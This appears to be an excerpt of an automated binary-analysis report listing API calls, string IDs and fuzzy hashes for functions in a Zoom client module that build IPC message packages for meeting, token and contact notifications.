                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.companion.token.response,-00000004,-00000004,com.Zoom.app.conf.companion.token.response), ref: 00C94E0F
                • EnterCriticalSection.KERNEL32(?), ref: 00C94EA1
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C94EBE
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,-00000004,-00000004,com.Zoom.app.conf.companion.token.response), ref: 00C94ED1
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: buddy_id$com.Zoom.app.conf.companion.token.response$dst_device_id$dst_resource_id$error$token
                • API String ID: 1443623190-2035437650
                • Opcode ID: a27eb9ec1ced54947a0bc759da08edd32270785a28bcaa24bd430b4647ef82d5
                • Instruction ID: b1d47c811eb87f230eef2c88440cdb19590eeda9f2e6ad5d450098ed9c923179
                • Opcode Fuzzy Hash: a27eb9ec1ced54947a0bc759da08edd32270785a28bcaa24bd430b4647ef82d5
                • Instruction Fuzzy Hash: 7841D575E007049BCF28EBA4C859A9EB770BF45306F044118EC12AB391DF709E4ADB69
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8CE87
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6CC50), ref: 00C8CE9B
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.onRegistrar.notification,00000044,00C6CC50), ref: 00C8CECD
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,com.zoom.app.assistant.sip.onRegistrar.notification), ref: 00C8CF0A
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.onRegistrar.notification,-00000004,-00000004,com.zoom.app.assistant.sip.onRegistrar.notification), ref: 00C8CF3C
                • EnterCriticalSection.KERNEL32(?), ref: 00C8CFCE
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C8CFEB
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,-00000004,-00000004,com.zoom.app.assistant.sip.onRegistrar.notification), ref: 00C8CFFE
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: CodeDetail$LineId$RespCode$RespDescription$Status$com.zoom.app.assistant.sip.onRegistrar.notification
                • API String ID: 1443623190-2011331210
                • Opcode ID: 77c378ffc28314557185823c414dd351b8590aebed3cc7fdee547ab9ad1f5ded
                • Instruction ID: 7ce9ea266d8f7cd931295cde05ea6a4faa1ae657357ec17bb3a7a056d05e9bea
                • Opcode Fuzzy Hash: 77c378ffc28314557185823c414dd351b8590aebed3cc7fdee547ab9ad1f5ded
                • Instruction Fuzzy Hash: 6141EF35E003059BCF24EBA4C98569EB7B5AF44319F044118EC12BB391DF709A8ADBB9
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CAA8DA
                  • Part of subcall function 00C59CDE: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,?,00000000,?,00C5BE77,?,00000000,?,?,00C5A4FD,00000000,?,?,?,00000000,00000002), ref: 00C59CF3
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,00000090), ref: 00CAA927
                • ?DirName@FilePath@Cmm@@QBE?AV12@XZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,?,?,?,00000090), ref: 00CAA952
                  • Part of subcall function 00CAADE0: __EH_prolog3.LIBCMT ref: 00CAADE7
                  • Part of subcall function 00CAADE0: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000008,00CAA957,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CAADFA
                  • Part of subcall function 00CAADE0: ?StripTrailingSeparatorsInternal@FilePath@Cmm@@AAEXXZ.RWSNDPQSKZ(?,00000008,00CAA957,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CAAE0B
                  • Part of subcall function 00CAADE0: ?find_last_of@?$CStringT@_W@Cmm@@QBEIPB_WII@Z.RWSNDPQSKZ(?,000000FF,00000002,?,00000008,00CAA957,?), ref: 00CAAE27
                  • Part of subcall function 00CAADE0: ?StripTrailingSeparatorsInternal@FilePath@Cmm@@AAEXXZ.RWSNDPQSKZ(?,00000008,00CAA957,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CAAE89
                  • Part of subcall function 00CAADE0: ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(?,?,00000008,00CAA957,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CAAE9B
                • ??9FilePath@Cmm@@QBE_NABV01@@Z.RWSNDPQSKZ(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000090), ref: 00CAA95F
                  • Part of subcall function 00CAAC30: __EH_prolog3.LIBCMT ref: 00CAAC37
                  • Part of subcall function 00CAAC30: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?), ref: 00CAAC49
                  • Part of subcall function 00CAAC30: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ ref: 00CAAC58
                  • Part of subcall function 00C57BE9: _Deallocate.LIBCONCRT ref: 00C57BFE
                • ?rbegin@?$CStringT@_W@Cmm@@QBE?AV?$reverse_iterator@V?$_String_const_iterator@V?$_String_val@U?$_Simple_types@_W@std@@@std@@@std@@@std@@XZ.RWSNDPQSKZ(?,-00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00CAA9B3
                • ?DirName@FilePath@Cmm@@QBE?AV12@XZ.RWSNDPQSKZ(?,?,?,-00000004,?,00000000,?), ref: 00CAA9F3
                • ?DirName@FilePath@Cmm@@QBE?AV12@XZ.RWSNDPQSKZ(?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAA23
                • ??9FilePath@Cmm@@QBE_NABV01@@Z.RWSNDPQSKZ(00000000,?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAA30
                • ?BaseName@FilePath@Cmm@@QBE?AV12@XZ.RWSNDPQSKZ(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000090), ref: 00CAAA4D
                  • Part of subcall function 00CAAEB0: __EH_prolog3.LIBCMT ref: 00CAAEB7
                  • Part of subcall function 00CAAEB0: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000004,00CAAA52,?,00000000,?), ref: 00CAAECA
                  • Part of subcall function 00CAAEB0: ?StripTrailingSeparatorsInternal@FilePath@Cmm@@AAEXXZ.RWSNDPQSKZ(?,00000004,00CAAA52,?,00000000,?), ref: 00CAAEDB
                  • Part of subcall function 00CAAEB0: ?erase@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@II@Z.RWSNDPQSKZ(00000000,00000001,?,00000004,00CAAA52,?,00000000,?), ref: 00CAAEF1
                  • Part of subcall function 00CAAEB0: ?find_last_of@?$CStringT@_W@Cmm@@QBEIPB_WII@Z.RWSNDPQSKZ(?,000000FF,00000002,?,00000004,00CAAA52,?,00000000,?), ref: 00CAAF01
                  • Part of subcall function 00CAAEB0: ?erase@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@II@Z.RWSNDPQSKZ(00000000,00000001,?,00000004,00CAAA52,?,00000000,?), ref: 00CAAF1A
                • ?Compare@?$CStringT@_W@Cmm@@QBEHPB_W@Z.RWSNDPQSKZ(?,-00000004,?,00000000,?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAA87
                • ?BaseName@FilePath@Cmm@@QBE?AV12@XZ.RWSNDPQSKZ(?,?,-00000004,?,00000000,?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAA97
                • ?DirName@FilePath@Cmm@@QBE?AV12@XZ.RWSNDPQSKZ(?,-00000004,?,00000000,?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAAC2
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@I@Z.RWSNDPQSKZ(?,00000001,?,-00000004,?,00000000,?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAAE1
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,-00000004,?,00000000,?,-00000004,?,?,?,-00000004,?,00000000,?), ref: 00CAAAFE
                  • Part of subcall function 00CA9D80: __EH_prolog3_catch.LIBCMT ref: 00CA9D87
                  • Part of subcall function 00CA9D80: ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,00000000,?,00000014,00CA9D6F,?,?,?,?,00CA9C1E,?,00000004), ref: 00CA9DDC
                  • Part of subcall function 00CAB8C2: __EH_prolog3.LIBCMT ref: 00CAB8C9
                  • Part of subcall function 00C57389: _Deallocate.LIBCONCRT ref: 00C573AC
                Similarity
                • API ID: Cmm@@$String$FilePath@$V01@@$??0?$$Name@V12@$H_prolog3$Internal@SeparatorsStripTrailing$?erase@?$?find_last_of@?$BaseDeallocateU?$char_traits@_V?$_V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@$?rbegin@?$Assign@?$Compare@?$H_prolog3_H_prolog3_catchSimple_types@_State@String_const_iterator@String_val@U?$_Unlock@V01@V?$reverse_iterator@W@std@@@std@@@std@@@std@@
                • String ID:
                • API String ID: 345324657-0
                • Opcode ID: da2ec3144ad49263b38d7b35b7edd6e43db781ee38b99976bf927146b2a941d9
                • Instruction ID: 6388b60f0d2511fca39eea2db9237a2165b46f5a7fcb0d30b239518c14edd4bd
                • Opcode Fuzzy Hash: da2ec3144ad49263b38d7b35b7edd6e43db781ee38b99976bf927146b2a941d9
                • Instruction Fuzzy Hash: ED914B75C00219DBCF15DFA4C991ADDBBB4AF19304F148199E849B3242EF306B89DF66
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C9296A
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C721F2,com.zoom.app.cci.ccivideo.settingssynctopt.request), ref: 00C92984
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,00000044,00C721F2,com.zoom.app.cci.ccivideo.settingssynctopt.request), ref: 00C929B2
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(-00000004,-00000004,?), ref: 00C929EF
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,?,-00000004,-00000004,?), ref: 00C92A1F
                • EnterCriticalSection.KERNEL32(?), ref: 00C92AB1
                • LeaveCriticalSection.KERNEL32(?,?), ref: 00C92ACE
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,-00000004,-00000004,?), ref: 00C92AE1
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: device_id$device_name$is_enable$level$req_type
                • API String ID: 1443623190-2683151144
                • Opcode ID: 89adb8acf9c14040c9e89e2a295b417382c38edfee9a19b7834d74bc1184d774
                • Instruction ID: b98327f2656d8af64ccd138c6efa395f3b1f1f1cbbe39127a0b7d00e45160259
                • Opcode Fuzzy Hash: 89adb8acf9c14040c9e89e2a295b417382c38edfee9a19b7834d74bc1184d774
                • Instruction Fuzzy Hash: 8441D335A00619ABCF24EFA4D9496DDB775AF44315F044118EC12AB381DF30DF8AEBA9
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C90234
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6FA9B), ref: 00C90248
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.broadcast.bind.audio.to.txchannel.request,00000044,00C6FA9B), ref: 00C9027A
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C902B7
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.broadcast.bind.audio.to.txchannel.request,?,-00000004), ref: 00C902E9
                • EnterCriticalSection.KERNEL32(00C6FA9B), ref: 00C9036B
                • LeaveCriticalSection.KERNEL32(00C6FA9B,?), ref: 00C90388
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004), ref: 00C9039B
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.zoom.app.assistant.broadcast.bind.audio.to.txchannel.request$signalType$sourceType$txChannelID$userID
                • API String ID: 1443623190-7522296
                • Opcode ID: 0f5f68adc885b96648307ff66ebf0d45f545f445a5e227d114f9dd0eb1c94b15
                • Instruction ID: 214c975e82a5909152bfc20666c6943eeddaadd7cb973817427a04338ba7f333
                • Opcode Fuzzy Hash: 0f5f68adc885b96648307ff66ebf0d45f545f445a5e227d114f9dd0eb1c94b15
                • Instruction Fuzzy Hash: 2F41DE75E006089FCF14EFA4C85969DB7B5AF48305F144128E812A7391DF709A8AEBA9
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C86364
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6871B), ref: 00C86378
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notifyConfStatus,00000044,00C6871B), ref: 00C863AA
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C863E7
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notifyConfStatus,?,-00000004), ref: 00C86419
                • EnterCriticalSection.KERNEL32(00C6871B), ref: 00C8649B
                • LeaveCriticalSection.KERNEL32(00C6871B,?), ref: 00C864B8
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004), ref: 00C864CB
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: FailoverReason$MeetingID$MeetingNumber$com.Zoom.app.conf.notifyConfStatus$status
                • API String ID: 1443623190-451630439
                • Opcode ID: 2b33f91bfaa3f25326be2a2aea8a1a5e93e449a535ce32229d113413c2eaf2b1
                • Instruction ID: 6c4179af36116a9956b566a177f3c19bf078b1730ad9b9a465b280f4f51d2ef2
                • Opcode Fuzzy Hash: 2b33f91bfaa3f25326be2a2aea8a1a5e93e449a535ce32229d113413c2eaf2b1
                • Instruction Fuzzy Hash: 0341D475E007149BCF15EFA4D845ADDB7B0AF44319F044118E812AB391DF709A8AEBA9
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C9449A
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C74F8B), ref: 00C944AE
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notify.conf.idp.token.result,00000044,00C74F8B), ref: 00C944E0
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C9451D
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notify.conf.idp.token.result,?,-00000004), ref: 00C9454F
                • EnterCriticalSection.KERNEL32(00C74F8B), ref: 00C945D1
                • LeaveCriticalSection.KERNEL32(00C74F8B,?), ref: 00C945EE
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004), ref: 00C94601
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: b64IDToken$b64token$com.Zoom.app.conf.notify.conf.idp.token.result$error$reqID
                • API String ID: 1443623190-2104861163
                • Opcode ID: a21fa0d8d0db357fa6733eae4b730691c7790855e36e144e4130dd7f8ea04c1a
                • Instruction ID: 60ea8fcec7c04bc9a315c1caa6aee3682af2b18428597dc6c9329917e89f533d
                • Opcode Fuzzy Hash: a21fa0d8d0db357fa6733eae4b730691c7790855e36e144e4130dd7f8ea04c1a
                • Instruction Fuzzy Hash: 8441F575E007049BCF18EBA4C949ADDB7B0AF55305F044158EC12AB391DF709B8BDB69
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C965EA
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C7720B), ref: 00C965FE
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.pmc.meet.chat.msg.readed.req,00000044,00C7720B), ref: 00C96630
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C9666D
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.pmc.meet.chat.msg.readed.req,?,-00000004), ref: 00C9669F
                • EnterCriticalSection.KERNEL32(00C7720B), ref: 00C96721
                • LeaveCriticalSection.KERNEL32(00C7720B,?), ref: 00C9673E
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004), ref: 00C96751
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.Zoom.app.conf.pmc.meet.chat.msg.readed.req$imChatMsgId$localReadedTime$meetChatMsgId$sessionId
                • API String ID: 1443623190-622571351
                • Opcode ID: 257999aa9edc0bea9fa5f41392664cadd6931e40db463c50b0e7499983df309a
                • Instruction ID: bbadaac864ac47608df9b06072e741149ae583b8a3ca9a584897d31a6888bf01
                • Opcode Fuzzy Hash: 257999aa9edc0bea9fa5f41392664cadd6931e40db463c50b0e7499983df309a
                • Instruction Fuzzy Hash: 0E41D474E007089BCF14EFA5D8496EDB775AF44309F044118E812A73D1DF709B8ADB69
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8C577
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6C4CB), ref: 00C8C58B
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.mediaapi.response,00000044,00C6C4CB), ref: 00C8C5BD
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C8C5FA
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.mediaapi.response,?,-00000004), ref: 00C8C62C
                • EnterCriticalSection.KERNEL32(00C6C4CB), ref: 00C8C6AE
                • LeaveCriticalSection.KERNEL32(00C6C4CB,?), ref: 00C8C6CB
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004), ref: 00C8C6DE
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.Zoom.app.pt.mediaapi.response$in_meeting$requestID$response_code$response_data
                • API String ID: 1443623190-917114086
                • Opcode ID: 57703040af50f30d8111db44f1edfceb224311ec580c79b9d496dad903a4c337
                • Instruction ID: 2f1ecc698f524867a66ab5b6bfddeca9322ad00969e62231edbc85dc9cc45d76
                • Opcode Fuzzy Hash: 57703040af50f30d8111db44f1edfceb224311ec580c79b9d496dad903a4c337
                • Instruction Fuzzy Hash: 8A41C434E007049BCF14EBA4D9466DDB774AF54319F044129F812AB391EF709A4ADB7D
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C92578
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C71BDB), ref: 00C9258C
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.outlook.imintegration.getcontactinfo.response,00000044,00C71BDB), ref: 00C925BE
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C925FB
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.outlook.imintegration.getcontactinfo.response,?,-00000004), ref: 00C9262D
                • EnterCriticalSection.KERNEL32(00C71BDB), ref: 00C926AF
                • LeaveCriticalSection.KERNEL32(00C71BDB,?), ref: 00C926CC
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004), ref: 00C926DF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: ContactEmail$PhotoPath$com.zoom.app.outlook.imintegration.getcontactinfo.response$presence$presenceText
                • API String ID: 1443623190-1042731040
                • Opcode ID: 28de14d8a050b15b8261599dd6e3b5fe5f7bf175d120cffdbc4b5a14ac6a1e07
                • Instruction ID: 50459348b647ff8deb745be5f9656ccf98e5ecc139a5963649ac1253bfe123b1
                • Opcode Fuzzy Hash: 28de14d8a050b15b8261599dd6e3b5fe5f7bf175d120cffdbc4b5a14ac6a1e07
                • Instruction Fuzzy Hash: BA41D234E00718ABCF15EFA4C84A6EDBB70AF45305F044118FC12AB391DF709A8ADB69
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C94879
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C7528B), ref: 00C9488D
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notify.pt.call.peer,00000044,00C7528B), ref: 00C948BF
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C948FC
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notify.pt.call.peer,?,-00000004), ref: 00C9492E
                • EnterCriticalSection.KERNEL32(00C7528B), ref: 00C949B0
                • LeaveCriticalSection.KERNEL32(00C7528B,?), ref: 00C949CD
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004), ref: 00C949E0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: IsDIDNumber$IsPrivacyName$Name$PhoneNumber$com.Zoom.app.conf.notify.pt.call.peer
                • API String ID: 1443623190-618993501
                • Opcode ID: b8909da49ce4d252360c6b0d0121155cc07973bba6180ba4e009d5651ce89b3a
                • Instruction ID: 98603ad9ddd70b00223e17f59fb462d48648b090a0a2c495396946e73764417d
                • Opcode Fuzzy Hash: b8909da49ce4d252360c6b0d0121155cc07973bba6180ba4e009d5651ce89b3a
                • Instruction Fuzzy Hash: 8D411734E007089BCF18EFA4D849ADEB774AF44305F054118E812A7391DF309E4BDB69
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C90977
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6FDDB), ref: 00C9098B
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.broadcast.unbind.audio.from.txchannel.response,00000044,00C6FDDB), ref: 00C909BD
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C909FA
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.broadcast.unbind.audio.from.txchannel.response,?,-00000004), ref: 00C90A2C
                • EnterCriticalSection.KERNEL32(00C6FDDB), ref: 00C90AAE
                • LeaveCriticalSection.KERNEL32(00C6FDDB,?), ref: 00C90ACB
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004), ref: 00C90ADE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.zoom.app.assistant.broadcast.unbind.audio.from.txchannel.response$result$signalType$sourceType$userID
                • API String ID: 1443623190-2890409769
                • Opcode ID: ebfdc62db105e97d72afcd40a9ddf558404a7b42e891b28f3c6b9c3f620ea20e
                • Instruction ID: 7d40fb52fba33f4afa6438e8cf1d54ecba674eca3573daf72cf47dd02e99fc0b
                • Opcode Fuzzy Hash: ebfdc62db105e97d72afcd40a9ddf558404a7b42e891b28f3c6b9c3f620ea20e
                • Instruction Fuzzy Hash: 02410135E003089FCF14EFA4D8496DEB7B4AF14315F104118E812BB391DF709A8AEBA9
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C8CA67
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C6CACB), ref: 00C8CA7B
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.meeting.cache.bytes.kv.op,00000044,00C6CACB), ref: 00C8CAAD
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004), ref: 00C8CAEA
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.meeting.cache.bytes.kv.op,?,-00000004), ref: 00C8CB1C
                • EnterCriticalSection.KERNEL32(00C6CACB), ref: 00C8CB9E
                • LeaveCriticalSection.KERNEL32(00C6CACB,?), ref: 00C8CBBB
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?,-00000004), ref: 00C8CBCE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: action$bytes_value$com.Zoom.app.meeting.cache.bytes.kv.op$data_type$key
                • API String ID: 1443623190-3532546848
                • Opcode ID: 8423abc9bb281d6d0f51711ed443937cd661721ee635990cb3f04fe06d7a3fc0
                • Instruction ID: 9eff94b16d5374e3b48a66a4a10a937b8dd1285d4b6db1b96eabedfca591fc05
                • Opcode Fuzzy Hash: 8423abc9bb281d6d0f51711ed443937cd661721ee635990cb3f04fe06d7a3fc0
